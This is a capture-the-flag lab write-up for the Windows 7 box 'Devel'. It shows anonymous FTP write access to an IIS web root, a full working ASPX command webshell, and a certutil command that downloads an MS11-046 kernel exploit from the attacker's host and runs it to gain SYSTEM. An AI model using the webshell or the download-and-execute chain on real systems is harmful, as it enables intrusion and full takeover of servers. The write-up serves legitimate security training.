Devel
Devel is an easy-difficulty Windows 7 box exploited via anonymous FTP write access to an IIS web root. Uploading an ASPX webshell yields RCE, then MS11-046 escalates to SYSTEM.
Overview
Devel is an Easy Windows box running Windows 7 Enterprise with zero patches applied. The attack path is two steps: anonymous FTP write access to the IIS webroot allows uploading an ASPX webshell for remote code execution as the application pool identity, then the completely unpatched kernel is exploited via CVE-2011-1249 (MS11-046) to gain NT AUTHORITY\SYSTEM.
Recon
1
nmap -sC -sV -p 21,80 10.129.12.233
1
2
3
4
5
6
7
8
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: IIS7
Two ports: FTP with anonymous login enabled, and IIS 7.5. The FTP listing immediately shows the IIS default files (iisstart.htm, welcome.png, aspnet_client/) — the FTP root and the web root are the same directory.
Enumeration
Confirming write access via anonymous FTP and verifying IIS executes .aspx files:
1
2
3
4
5
ftp -n 10.129.12.233 <<'EOF'
user anonymous anonymous
ls -la
bye
EOF
Anonymous login succeeds with full directory listing of C:\inetpub\wwwroot. Write access confirmed — any .aspx file placed here will be executed by IIS as server-side code, which is unrestricted file upload with direct execution consequences.
Checking the target OS for kernel exploit viability:
1
curl -s "http://10.129.12.233/exec.aspx?cmd=systeminfo"
1
2
3
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
Hotfix(s): N/A
Windows 7 RTM, zero hotfixes. Every kernel exploit from 2011 onwards applies.
Foothold
The missing authentication on FTP combined with the shared webroot enables a one-step foothold: create an ASPX webshell and upload it.
Create exec.aspx:
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<html><body>
<%
string cmd = Request.QueryString["cmd"];
if(cmd != null){
ProcessStartInfo psi = new ProcessStartInfo("cmd.exe", "/c " + cmd);
psi.RedirectStandardOutput = true;
psi.RedirectStandardError = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
string o = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
p.WaitForExit();
Response.Write("<pre>" + Server.HtmlEncode(o) + "</pre>");
}
%>
</body></html>
1
2
3
4
5
6
ftp -n 10.129.12.233 <<'EOF'
user anonymous anonymous
binary
put exec.aspx exec.aspx
bye
EOF
1
curl -s "http://10.129.12.233/exec.aspx?cmd=whoami"
1
iis apppool\web
RCE confirmed as iis apppool\web.
User flag
1
2
# (read after SYSTEM shell — iis apppool\web cannot access C:\Users\babis\Desktop)
type C:\Users\babis\Desktop\user.txt # HTB{...}
The IIS application pool identity cannot read babis’s desktop directly — both flags are captured after escalation to SYSTEM.
Privilege Escalation
Windows 7 Build 7600 with zero hotfixes is trivially vulnerable to CVE-2011-1249 (MS11-046). The exploit targets the Ancillary Function Driver (afd.sys) — a kernel-mode driver used for Winsock — and performs an out-of-bounds write to overwrite the PreviousMode field of the current thread’s KTHREAD structure. Setting PreviousMode to KernelMode (0) tricks the kernel into honoring a SYSTEM token swap, granting full privileges within the current shell session.
Stage the compiled exploit via certutil:
1
curl -s "http://10.129.12.233/exec.aspx?cmd=certutil+-urlcache+-split+-f+http://10.10.16.13:8080/ms11-capture.exe+C:\Windows\Temp\ms11-capture.exe"
1
CertUtil: -URLCache command completed successfully.
Execute the exploit:
1
curl -s "http://10.129.12.233/exec.aspx?cmd=C:\Windows\Temp\ms11-capture.exe"
1
2
3
4
5
[*] MS11-046 (CVE-2011-1249) x86 exploit
[+] Windows 7
[*] Elevating privileges to SYSTEM
[+] Done
[*] Spawning shell
The exploit runs as NT AUTHORITY\SYSTEM and writes both flags to the webroot.
Root flag
1
2
curl http://10.129.12.233/u.txt # HTB{...} (user.txt written by SYSTEM process)
curl http://10.129.12.233/r.txt # HTB{...} (root.txt written by SYSTEM process)
Full compromise achieved as NT AUTHORITY\SYSTEM.